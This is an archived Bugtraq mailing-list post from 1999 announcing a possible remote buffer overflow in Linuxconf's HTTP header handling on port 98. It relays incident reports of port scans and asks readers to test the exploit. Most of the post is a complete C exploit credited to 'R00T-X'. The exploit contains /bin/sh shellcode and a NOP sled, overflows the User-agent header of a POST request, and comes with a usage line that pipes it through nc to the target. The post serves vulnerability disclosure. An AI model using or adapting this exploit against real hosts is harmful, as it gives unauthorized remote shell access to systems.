Bugtraq mailing list archives
(Possible) Linuxconf Remote Buffer Overflow Vulnerability
From: aleph1 () SECURITYFOCUS COM (Elias Levy)
Date: Tue, 21 Dec 1999 10:31:14 -0800
There may exists a buffer overflow vulnerability in the Linuxconf package shipped with some version of Linux systems. The vulnerability may be in the program's handling of HTTP headers. Initial testing with Linuxconf 1.16r10 under RedHat 6.0 was inconclusive. If other can test the exploit and report their results it would be appreciated. This is an example of what good can happen from sharing security incident information. There have been reports in the INCIDENTS mailing list for several months now of scans for port 98. Since no publicly known major vulnerabilities existed in this service the traffic was somewhat strange. After some digging around Jon Starnaud <jon.starnaud () rci com> was able to find this exploit. If you are not subscribed to INCIDENTS and wish to share incident information I suggest you sign up. If the vulnerability does exists this would be the second vulnerability we discover thanks to sharing incident information (the first one being sadmind). http://www.securityfocus.com/forums/incidents/faq.html /* linuxconf exploit by R00T-X (c) 1999 USER_AGENT overflow x86 should work on all linux's but you need to have network access to linuxconf greetz to: j0e, AcidCrunCh, |420|, umm and everyone who knows me, heh :P have fun with this but for EDUCATIONAL PURPOSES :) Usage: (./linexp <offset>;cat)| nc targethost 98 */ char shell[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\xeb\x3b\x5e\x89\x76\x08\x31\xed\x31\xc9\x31\xc0\x88" "\x6e\x07\x89\x6e\x0c\xb0\x0b\x89\xf3\x8d\x6e\x08\x89\xe9\x8d\x6e" "\x0c\x89\xea\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\xe8\xc0\xff\xff\xff/bin/sh\x00"; #include <stdio.h> #include <stdlib.h> #include <limits.h> #include <string.h> #define BUFLEN 1025 #define NOP 0x90 void main (int argc, char *argv[]) { char buf[BUFLEN]; int offset,nop,i; unsigned long esp; char shell[1024+300]; if(argc < 2) { fprintf(stderr,"usage: (%s <offset>;cat)|nc host.com 98\n", argv[0]); exit(0); } nop = 511; esp = 0xefbfd5e8; offset = atoi(argv[1]); memset(buf, NOP, BUFLEN); memcpy(buf+(long)nop, shell, strlen(shell)); for (i = 256; i < BUFLEN - 3; i += 2) { *((int *) &buf[i]) = esp + (long) offset; shell[ sizeof(shell)-1 ] = 0; } printf("POST / HTTP/1.0\r\nContent-Length: %d, User-agent: \r\n", BUFLEN); for (i = 0; i < BUFLEN; i++) putchar(buf[i]); printf("\r\n"); return; } -- Elias Levy Security Focus http://www.securityfocus.com/
Current thread:
- Re: Reinventing the wheel (aka "Decoding Netscape Mail passwords"), (continued)
- Re: Reinventing the wheel (aka "Decoding Netscape Mail passwords") John Viega (Dec 16)
- Re: Reinventing the wheel (aka "Decoding Netscape Mail passwords") Tim Hollebeek (Dec 16)
- Re: Reinventing the wheel (aka "Decoding Netscape Mail passwords") Aleph One (Dec 16)
- ssh/rsaref bo exploit code Iván Arce (Dec 16)
- Re: Reinventing the wheel (aka "Decoding Netscape Mail passwords") Rob Jones (Dec 16)
- More on Red Hat 6.1 sysklogd David F. Skoll (Dec 19)
- Security vulnerability in certain wu-ftpd (and derivitives) configurations (fwd) suid (Dec 19)
- Netscape password scrambling Gary McGraw (Dec 20)
- Re: Reinventing the wheel (aka "Decoding Netscape Mail passwords") Holger van Lengerich (Dec 20)
- Microsoft Security Bulletin (MS99-059) Microsoft Product Security (Dec 20)
- (Possible) Linuxconf Remote Buffer Overflow Vulnerability Elias Levy (Dec 21)
- Infoseek Ultraseek Remote Buffer Overflow luciano (Dec 16)
- Re: Infoseek Ultraseek Remote Buffer Overflow Marc (Dec 16)